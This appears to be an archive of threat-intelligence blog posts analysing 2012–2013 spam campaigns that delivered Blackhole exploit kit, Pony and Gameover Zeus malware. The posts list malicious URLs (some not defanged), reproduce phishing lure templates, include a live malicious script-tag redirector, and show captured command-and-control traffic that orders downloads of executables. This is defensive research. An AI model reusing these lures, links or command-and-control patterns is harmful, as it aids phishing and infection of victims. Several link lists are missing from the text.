Category Archives: Botnet

Update: 950 Euro transfer to Intesa Sanpaolo

New Hostile URLs observed on April 5, 2013:

 

hxxp://www.freerider.it/info1.html
hxxp://heartmecouture.com/info1.html
hxxp://www.milservice.pl/info1.html
hxxp://moneysystem.50webs.com/info1.html
hxxp://www.schmerbachskeller.de/info1.html
hxxp://svdnet.com/info1.html
hxxp://elima-docs-tpr.narod.ru/info1.html
hxxp://gesfi.com/info1.html
hxxp://www.padcacweb.pwp.blueyonder.co.uk/info1.html
hxxp://50.63.26.224/info1.html
hxxp://www.pon-vonbohlmannsland.de/info1.html
hxxp://ferret.perm.ru/info1.html
hxxp://www.mtetv.it/info1.html
hxxp://www.kkwalberberg.mynetcologne.de/info1.html
hxxp://w0e2fj2b3.homepage.t-online.de/info1.html
hxxp://personal.nbnet.nb.ca/info1.html
hxxp://valleylabel.net/info1.html
hxxp://nightfox.republika.pl/info1.html
hxxp://troop228.info/info1.html
hxxp://matpol.cba.pl/info1.html
hxxp://www.gianlucaboezio.it/info1.html
hxxp://www.wittmann-praxis.de/info1.html
hxxp://champwrestlinginfo.tripod.com/info1.html
hxxp://spiritoftheage.org.uk/info1.html
hxxp://www.stock-marketfair.com/info1.html
hxxp://www.magna4.com.br/info1.html
hxxp://biancas-scrapseite.pytalhost.de/info1.html
hxxp://ostunivilla.com/info1.html
hxxp://papagai.de/info1.html
hxxp://www.stahlvolleyballa.homepage.t-online.de/info1.html
hxxp://www.cyted.com/info1.html
hxxp://sttrni.com.br/info1.html
hxxp://wabostudios.com/info1.html
hxxp://www.ceccatobassano.it/info1.html
hxxp://www.sitkarymowanie.republika.pl/info1.html
hxxp://dokutainment.square7.ch/info1.html
hxxp://www.biglife.de/info1.html
hxxp://www.advmorais.com.br/info1.html
hxxp://www.chenilleawardletters.net/info1.html
hxxp://jkatinc.com/info1.html
hxxp://lawsonprinters.com/info1.html
hxxp://pianowithchris.com/info1.html
hxxp://prod1-imagesvu.integra.fr/info1.html
hxxp://qmbit.de/info1.html

 

This page contain an encoded script which is used to redirect to a Blackhole exploit kit v 2.x at hxxp://bangpleasure.com/news/wanting_book_switch.php. This BH kit is hosted at IP address 97.107.142.157 at the time of this writing.

 

 

 

950 Euro transfer to Intesa Sanpaolo

We analyzed a spam theme distributed from Cutwail SpamBot that is used theme of “950 Euro transfer to Intesa Sanpaolo” on April 04, 2013:

Spam Subject(s):

Si deve essere attestato a 950,00 à dal tuo conto corrente bancario presso Intesa anPaolo.
Richiesta di ammortamento di à 950,00 dal conto bancario di Intesa SanPaolo
Gli ammortamenti delle 950,00 à dal tuo conto bancario in Intesa SanPaolo
à 950,00 sono dal vostro conto di Intesa SanPaolo ammortizzato in 24 ore

Spam Template:

<!DOCTYPE html PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>
<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODY>

Gentile Cliente, <br>
Abbiamo ricevuto la richiesta di ammortamento di à 950,00 dal proprio conto bancario in Intesa SanPaolo per risolvere la consegna dei documenti. <br>L’ammortamento dei fondi e la trasmissione di documenti ulteriori fatto in 24 ore.<br><br>
<a href=”hxxp://herr-pferd.de/info1.html”>Vedi i dettagli dell’ordine </a> <br>
Cordiali saluti, Servizio clienti sostegno della Intesa SanPaolo Banca.<br>
</BODY></HTML>

Hostile URL(s):

hxxp://herr-pferd.de/info1.html
hxxp://nwernau.de/info1.html
hxxp://soswciechanow.home.pl/info1.html
hxxp://www.glueckauf-altenburg.de/info1.html
hxxp://nyhus.dk/info1.html
hxxp://barake.de/info1.html
hxxp://renata.weihs.w.interia.pl/info1.html
hxxp://vinkraj.narod.ru/info1.html
hxxp://mmjackofm.w.interia.pl/info1.html
hxxp://217.170.66.122/info1.html
hxxp://209.41.177.143/info1.html
hxxp://www.skemadtc.it/info1.html
hxxp://kumballa.de/info1.html
hxxp://www.samba-loco.de/info1.html
hxxp://brauerildiko.hu/info1.html
hxxp://public.dataproject.com/info1.html
hxxp://www.nationalhymne.de/info1.html
hxxp://angstrem.com.pl/info1.html
hxxp://mojdziennik.cba.pl/info1.html
hxxp://eleganceshop.home.pl/info1.html
hxxp://xchange.thegateworldwide.com/info1.html
hxxp://www.burningwick.pwp.blueyonder.co.uk/info1.html
hxxp://jwjoomla.cwsurf.de/info1.html
hxxp://www.agliati.it/info1.html
hxxp://best-nk.c0.pl/info1.html

The text ‘Vedi i dettagli dell’ordine’ contains a hyperlink to one of the URLs listed above. This page contain an encoded script which is used to redirect to a Blackhole exploit kit v 2.x at hxxp://23.advertisingspecialties.biz/news/wanting_book_switch.php. This BH kit is hosted at IP address 96.126.106.62 at the time of this writing.

The kit attempts to download the following files/exploits:

hxxp://23.advertisingspecialties.biz/news/wanting_book_switch.php?tsltj=1l:30:1l:32:32&gmon=3j&eyoyoeuy=1o:30:32:30:1h:1j:1i:1f:1n:33&ggievtn=1o:1d:1f:1d:1f:1d:1f
Name: a4ccf.pdf
Identifier: CVE-2010-0188 exploit
Type: PDF document, version 1.6
Size: 9895 bytes
MD5sum: 1ef1040ba77c13ddc268ca34a4b030c6

If exploitation is successful, it redirects to hxxp://23.advertisingspecialties.biz/news/wanting_book_switch.php?fvpcpp=1l:30:1l:32:32&irzg=1o:30:32:30:1h:1j:1i:1f:1n:33&phrua=1i&nlcdd=obmoxwk&fdrehtz=gfyuft, a Pony variant with the following properties is downloaded:

Name: contacts.exe
Identifier: Pony downloader
Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size: 150,528 bytes
MD5: c42105cc624659827773cb62de516d5a

Pony downloader posts to its dropzone at:

hxxp://3ecompany.com:8080/forum/viewtopic.php

hxxp://23.advertisingspecialties.biz/forum/viewtopic.php

hxxp://23.area-plumbing-company.com/forum/viewtopic.php

hxxp://23.debtfreein100days.com/forum/viewtopic.php

 

Pony downloader was configured to download Gameover Zeus payloads from following locations:

1. hxxp://agarest.com/dckWfjue.exe
2. hxxp://kj-supply.com/JUz8cnK.exe
3. hxxp://chadgunderson.com/ZUmJx.exe

Gameover installes in %APPDATA%\Ppro\rfluo.exe and had following file properties:

File: rfluo.exe
Size: 376,832 bytes
MD5: 6e65ca8fa550b03d1f377cc1c685abd8
Build TimeStamp: 2013-03-16 18:17:58
Language Code: Russian
Character Set: Unicode
Company Name: Корпорация Майкрософт
File Description: Монитор устройств неподвижных изображений
File Version: 5.1.2600.5512 (xpsp.080413-0852)

The Gameover variant had a botid of “candyshop” and cid of 8888. Following P2P Drones were found embedded inside the Gameover Zeus payload:

178.122.63.254:26281
99.54.188.39:17053
78.166.181.174:25812
49.49.77.245:11443
95.58.110.195:28758
94.240.224.115:27794
147.8.213.30:18592
95.104.51.216:25833
194.94.127.98:25549
176.73.238.72:22869
69.77.132.197:20764
75.6.222.103:11577
71.136.48.91:22174
203.128.247.114:29667
186.96.66.82:17103
63.139.177.211:11505
78.139.187.6:14384
198.101.63.2:13725
90.176.158.215:15920

Scanned Image from a Xerox WorkCentre

We analyzed following malicious attachment that is used in Xerox Scanned Image theme spam on February 14 2013:

Spam Subject:
Scanned Image from a Xerox WorkCentre

Spam Template:

Device Name: Not Set
Device Model: Scab-3871N
Location: Not Set

File Format: PDF (Medium)
File Name: Scan_02-13-2013-245.zip
Resolution: 200dpi x 200dpi

Attached file is scanned image in PDF format.
Adobe(R)Reader(R) can be downloaded from the following URL: hxxp://www.adobe.com/

File: Scan_02-13-2013_245.zip
MD5: 2688370c5fd8bc197141a55d43883ad4
Size: 117,606 bytes

Pony downloader posts to its dropzone at hxxp://88.190.210.199/ponyb/gate.php. It was also configured to download 3 Gameover Zeus payloads from following locations:
1. hxxp://www.inaji.jp/5Ncs.exe
2. hxxp://w6050v1kc.homepage.t-online.de/KYrngX.exe
3. hxxp://socialighter.co.za/3N0k.exe
Gameover installes in %APPDATA%\Iriwb\tuoqf.exe and had following file properties:

File: tuoqf.exe
MD5: cd08cfedf5033ce7b18a0e1be4d23501
Size: 309,760 bytes
Time-Stamp: 2013-02-5 20:09:27
This Gameover Zeus variant posts to a dropzone at 66.229.110.89:28898. Webinjects were downloaded from 174.110.150.207:23173. The Gameover variant had a botid of “dotf14.

Following P2P Drones were found embedded inside the Gameover Zeus payload:

1.186.47.244:16276
72.227.149.1:19320
108.211.64.46:23323
71.43.217.3:11403
94.67.187.38:12457
66.229.110.89:28898
190.203.42.42:12579
74.235.184.84:27524
94.65.14.73:22510
194.94.127.98:25549
223.204.193.72:22233
120.61.188.154:29013
91.99.200.6:29806
64.219.121.189:13503
174.110.150.207:16149
95.57.163.144:12290
71.86.150.224:20781
213.189.69.49:13564

First Foundation Bank Secure Email Notification

We analyzed following malicious attachment that is used in First foundation Bank theme spam on February 14 2013:

Spam Subject:
First Foundation Bank Secure Email Notification – 29834077

Mail From:
“FF-inc Secure Notification” <secure.notification@ff-inc.com>
Spam Template:

You have received a secure message

Read your secure message by opening the attachment, secure_mail_29834077. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it in a Web browser. To access from a mobile device, forward this message to mobile@res.ff-inc.com to receive a mobile login URL.

If you have concerns about the validity of this message, please contact the sender directly. For questions about secure e-mail encryption service, please contact technical support at 888.230.9081.

2000-2013 First Foundation Inc. All rights reserved.

File: secure_mail_29834077.zip
MD5: e6454c2cb43c669906fcdbe199a195f3
Size: 118,086 bytes

Pony downloader posts to its dropzone at hxxp://88.190.210.199/ponyb/gate.php. It was also configured to download 3 Gameover Zeus payloads from following locations:

1. hxxp://angeloelacicca.altervista.org/kcprVD.exe
2. hxxp://www.dalcin.it/d2sqx.exe
3. hxxp://geeksleaks.com/h0L7.exe
Gameover installes in %APPDATA%\Qaajda\okubha.exe and had following file properties:

File: okubha.exe
MD5: e1b3e6a075ac40ff5ecc8c37d3bbced4
Size: 309,760 bytes
Time-Stamp: 2013-02-5 20:09:27
This Gameover Zeus variant posts to a dropzone at 99.109.198.196:21961. Webinjects were downloaded from 174.110.150.207:23173. The Gameover variant had a botid of “citif14”.

Following P2P Drones were found embedded inside the Gameover Zeus payload:

70.137.132.232:18161
99.109.198.196:21961
72.227.149.1:19320
94.67.187.38:12457
1.186.47.244:16276
71.43.217.3:11403
190.203.42.42:12579
93.177.174.72:10119
120.61.188.154:29013
94.65.14.73:22510
64.219.121.189:13503
66.229.110.89:28898
194.94.127.98:25549
223.204.193.72:22233
95.57.163.144:12290
174.110.150.207:16149
91.99.200.6:29806
74.235.184.84:27524
213.189.69.49:13564

Action Required – Time Sensitive Material (Detma.org)

We analyzed following malicious attachment that is used in Detma.org theme spam on February 12 2013:

Spam Subject:
Action Required – Time Sensitive Material
From Address:
“Unemployment Assistance@detma.org” <info@detma.org>

Spam Template:

Action Required

File: case#95648678394857345~93245725793248.zip
MD5: dd28a6cc3df2b1608dc15a4b397013b4
Size: 102,170 bytes

Pony downloader posts to its dropzone at hxxp://carmine.warsheet.com/forum/viewtopic.php hosted at IP address 174.122.102.165. It was also configured to download 3 Gameover Zeus payloads from following locations:
1. hxxp://seunig.de/L5Fvb.exe
2. hxxp://limitedltd.be/CtSfQca3.exe
3. hxxp://visiterlareunion.fr/3gyrJ8B8.exe
Gameover installes in %APPDATA%\Ixra\osso.exe and had following file properties:

File: oss.exe
Size: 309,760 bytes
MD5: 93e6daf13f5239af3d7a44ecfee1b3c5
Time-Stamp: 2013-02-05 20:09:27
This Gameover Zeus variant posts to a dropzone at 180.251.247.89:12043. Webinjects were downloaded from 95.137.226.107:12656. The Gameover variant had a botid of “bofaf12” and cid of 5555.

Following P2P Drones were found embedded inside the installed Gameover Zeus payload:

182.53.159.239:21908
193.206.41.25:23766
202.29.48.110:27464
194.219.108.252:13955
99.54.188.39:28335
83.111.92.83:19194
117.198.82.160:16553
105.227.214.178:13349
85.238.56.148:10598
174.110.150.207:16149
120.61.165.227:28649
213.189.69.49:13564
168.216.148.2:17586
74.235.184.84:27524
41.97.100.220:24282
194.94.127.98:25549
82.211.186.140:29092
94.68.61.135:14511

ADP Funding Notification – Debit Draft

Weve been quiet recently, but we havent stopped our work. Behind the scenes weve been developing some new tools and techniques that we hope will enable us to more efficiently track the bad guys. We used some of these new tools and techniques in our analysis of a new spam run today that spoofed communications from ADP. We observed spam messages with the subject line “ADP Funding Notification – Debit Draft”. The spam sample we analyzed was sent from 78.96.173.243 – a known Cutwail spambot.

The link in this message directed victims to junnioreadriano.com.br/MZ0PnMj5/index.html. Note that our bad guys are still using the same /8-random-character/index.html pattern. This page contained the following two malicious javascript redirectors:

http://ftp.leocardz.com/BhSFTbq9/js.js
http://www.webondemand.altervista.org/V4uags9T/js.js

These javascripts redirector victims to a Blackhole Exploit kit at 50.116.38.183. This Blackhole exploit kit was hosting at least 9 different malicious payloads. Detected malware payloads identified by MD5 hash included the following:

ce03b87d1d10e76526883077d3924528
937b44fbb5fec18f53c6de60a801d8ed
13fd74a6dc4f1e8e952ea2bc692ede5e
58859d47ccd39461a52a9455f3b0a8ac
9af1128108aac221fd16ddc213c8147a
48a5cd662c66fcdf3ee96ea2126096c7
a08780b691232573e9895589b7f0b76f
1b1bbf726902beb3b25d11fbdc58720f
ededc8b9d03ded0cb7818dc2ef72ad4c

All of these binaries appear, upon initial inspection, to be Pony downloaders.

Contact to the nearest post office

On 2012-04-26 we observed a round of USPS flavored spam. We analyzed a spam message with the subject line “Contact to the nearest post office “. The full message was as follows:

Notification, 

We couldn’t deliver your parcel at your address. 

Reason deny: Postal code contains an error. 
LOCATION OF YOUR PARCEL:Des Moines 
STATUS OF YOUR ITEM: sort order 
SERVICE: Expedited Shipping 
Parcel number:U171553881 NU 
FEATURES: Yes 

The label of your parcel is enclosed to the letter. 
You should print the label and show it in the nearest post office to 
get a parcel. 

Important information! 
If the parcel isn’t received within 30 working days our company will 
have the right to claim compensation from you for it’s keeping in the 
amount of $12.28 for each day of keeping of it. 

You can find the information about the procedure and conditions of 
parcels keeping in the nearest office. 

Thank you for attention. 
USPS Express Services. 

Attached to this spam was the following zip archive:

File: Label_Parcel_USPS.NR_213-7004.zip
Size: 24725
MD5: 21464652804DE3916D755C75286AD5C4

This zip archive contained the following malicious downloader:

File: Label_Parcel.exe
Size: 26112
MD5: B37B8B306E9D2C1EEED0FB71C32E1657

This downloader was installed on the victim filesystem in the following location C:\Documents and Settings\Administrator\Local Settings\Application Data\urlmon.exe.

This downloader sent the following GET request to a control server at  everkosmo2012.ru:

GET /ab/index.php?r=gate&id=d0ef7554&group=24.04.2012_a&debug=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: everkosmo2012.ru

The control server returned the following response:

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Thu, 26 Apr 2012 12:52:08 GMT
Content-Type: text/html
Content-Length: 44
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze8
Vary: Accept-Encoding

run=http://www.baracademie.ca/_notes/ddd.exe

The downloader parsed the run= command and then downloaded the following executable from http://www.baracademie.ca/_notes/ddd.exe:

File: ddd.exe
Size: 579586
MD5: C64A7822CBF2EBA42D911B4F9E7C5D78

This executable is the same type of Office document stealer previously discussed in our American Airlines Ticket Attachment post. This Office document stealer variant POSTs stolen documents to everkosmo2012.ru over port 8000.

The initial downloader then sent a second GET request to the control server at everkosmo2012.ru. The control server responded, instructing the downloader to grab a secondary malware executable from http://www.baracademie.ca/_notes/mmm.exe. This executable was an Asprox spambot. It had the following properties:

File: mmm.exe
Size: 237056
MD5: 650912C5F2763F55196616B76D880CAD

This Asprox spambot retrieved its configuration file via the following POST request to a control server at illinoisnot.ru:

POST /wet.php HTTP/1.1
Host: illinoisnot.ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746

The configuration file included a spam template to be used in spamming operations. The downloaded spam template was as follows:

Message-ID: <%%MSGID%%>
From: %%FROM%%
To: <%%RCPT%%>
Subject: %%SUBJ%%
Date: %%DATE%%
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=”%%BND:1%%”
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

The configuration file instructed the Asprox bot to spam additional USPS-themed messages.

We noted that the domain illinoisnot.ru resolved to 81.17.24.72. This IP previously hosted other suspect domains including:

  • luxas87612.ru
  • bristol1883314.ru
  • equator991534.ru
  • ocean8838354.ru
  • chukchi293494.ru
  • chart71445.ru
  • chart71445.ru
  • kiribati23547.ru
  • united55658.ru
  • surero14568.ru
  • virific2012b.ru

We know that at least the bristol1883314.ru domain hosted a Smoke Loader control server.

Confirm your US airways online reservation

On 2011-04-09 we observed an interesting round of US Airways spam. The sample we analyzed had a subject line of “Confirm your US airways online reservation”.

While this same template had been previously used in high-profile Gameover Zeus laden spam campaigns, this particular campaign was a bit different. The sample we analyzed had a link to a malicious page at go2gamers.com/us.html. Other spam samples from the same campaign had links to hacked websites with malicious us.html pages.

The malicious us.html page contained javascript that redirected victims to a Blackhole Exploit Kit at bamboozlefitclub.net/main.php?page=745b81e2608709b2.  The bamboozlefitclub.net domain resolved to 85.189.11.134.

This Blackhole kit dropped a Bugat* payload with the following properties:

File: about.exe
Size: 71680
MD5: D1455B0C28A145C5D207F276F945ABCA

Unlike other Bugat payloads that weve documented here that used a domain generation algorithm to determine its command and control server, this variant was hardcoded to connect to 4 domains for command and control instructions. This variant was configured to connect to the following:

scanforsecurytyholes.ru
testnosecurity.ru
securytycheckme.ru
krjjfgzzzooooem.ru

The scanforsecurytyholes.ru and securytycheckme.ru are currently offline. The other domains 91.201.4.142. After this variant successfully connected to the first available command and control server, in this case testnosecurity.ru/mev/in, it downloaded a configuration file that included a target list of over 400 websites. The vast majority of these targets were financial institutions. If youd like a copy of the target list hit us up at spamalysis@gmail.com.

The downloaded configuration file also revealed the location of the the domains hosting web injects. Bugat, and other banking malware, use web injects to dynamicly man-in-the-middle a victims online banking session. Basically, when a victim logs into their bank’s website these web injects will take control of their session and steal the victim’s banking information in real-time. The webinjects used by this Bugat variant were pulled from http://lavonoplanet.ru/mev/in/cp.php. The domain lavonoplanet.ru resolved to 91.201.4.142.

In addition to providing a configuration file, the command and control server at testnosecurity.ru also pushed a Bugat update on its victims. This updated Bugat payload had the following properties:

Size: 75271
MD5: 0386F4D83DD84D2F60352E00D3F504A6

This updated variant was configured to connect to the following command and control servers:

securytycheckme.ru
sexnotincity.ru

The domain securytycheckme.ru was offline, but the domain sexnotincity.ru resolved to 91.201.4.143. It seems like these guys like to host their domains in the same neighborhood. Mental note … stay out this /24.

The updated Bugat variant pulled its webinjects from the following domains:

http://gloogle.in/mev/in/cp.php
https://meredianstatserv.com/aqweb/in.php

We apologize for not reporting on this one sooner but unfortunately our real lives got in the way this week.

* note, what we call Bugat others call Feodo or Cridex.

Important Information About Your Account

The spammers sure are busy. Today, 2012-04-11, we observed a new spam template spoofing communications from BillMeLater.com – a PayPal service. The spam sample we analyzed had a subject line of “Important Information About Your Account”.

The observed sample contained a malicious link to pe04.com.br/gMsyk6kT/index.html. This page contained the following javascript redirector:

<script type=”text/javascript” src=”http://axislegal.com.au/gcq37VtM/js.js”></script&gt;

The above javascript redirected victims to a Blackhole Exploit Kit at http://209.59.219.231/showthread.php?t=d7ad916d1c0396ff.

This kit dropped a number of different exploits including the latest and greatest Java Exploit CVE-2012-0507. This malicious .jar file had the following properties:

File: Klot.jar
Size: 15719
MD5: 26720F0252EB91BB7A326375313651F9

The kit also dropped a Gameover Zeus variant with the following properties:

Size: 301096
MD5: 5CE366E6D7A949552AF10C4DEAF47506

The Gameover variant had a botid of NRa11. The criminals responsible for this campaign utilized a proxy at 200.58.99.114 to control victims infected with this Gameover variant.

Your AT&T wireless bill is ready to view

On 2012-04-03 we observed another new spam template circulating in the wild. This spam template spoofed communications from AT&T Wireless. I guess the Verizon Wireless spam campaigns weve seen in the last few weeks were a success and the spammers behind these attacks decided to try out a new brand. The AT&T Wireless spam template that we analyzed had a subject line of “Your AT&T wireless bill is ready to view”.

The spam message that we analyzed was loaded with malicious links. These links were as follows:

Each spam message associated with this campaign likely contains a different assortment of malicious links. The common characteristic of all these malicious links is that they all contain a random set of 8 alpha-numeric characters in the URI path. This identifier has remained consistent across all the different spam templates associated with this particular campaign.

The malicious pages above hosted the following javascript redirectors:

Note that these javascript redirectors also contained the same pattern of 8 alpha-numeric characters in the URI path.

These javascripts redirected victims to a Blackhole Exploit kit at http://174.140.171.100/showthread.php?t=d7ad916d1c0396ff.

As with the previous Blackhole Exploit kits weve documented on this blog, this exploit kit targets an assortment of PDF, Flash, MSFT, and Java vulnerabilities. These most effective exploit code hosted at this and other Blackhole kits used in this ongoing campaign appears to be the Java Atomic Exploit which targets CVE-2012-0507. This exploit was hosted on the Blackhole Exploit kit at 174.140.171.100 as a .jar file with the following properties:

File: Pol.jar
Size: 14314
MD5: 8050B15A9D6A530BBADC564813BCB2EB

This .jar file was only detected by 2 of 41 AV Vendors on Virustotal.

The Blackhole Exploit Kit at http://174.140.171.100/showthread.php?t=d7ad916d1c0396ff dropped the following Pony downloader on vulnerable victims:

File: contacts.exe
Size: 95272
MD5: FFDC8980585A48DF7B63388A1B3C3642

This Pony variant was configured to send stolen FTP and other web admin credentials to dropzones at”

We know that 91.121.178.156 was previously home to a Blackhole Exploit Kit. We know because urlQuery.net told us. While the domain subdatapro.com is not currently on our radar, we would not be surprised if it served a Blackhole Exploit Kit in the not too distant future.

The Pony variant (FFDC8980585A48DF7B63388A1B3C3642) was also configured to download a Gameover Zeus variant from the following locations:

This Gameover Zeus variant had the following properties:

Size: 296488
MD5: 54A3D8C0F15E16655CAF35306EFC87E5

This variant had a botid of NRa3. The criminals behind this campaign utilized a proxy at 77.43.1.67:443 to control victims infected with this Gameover variant.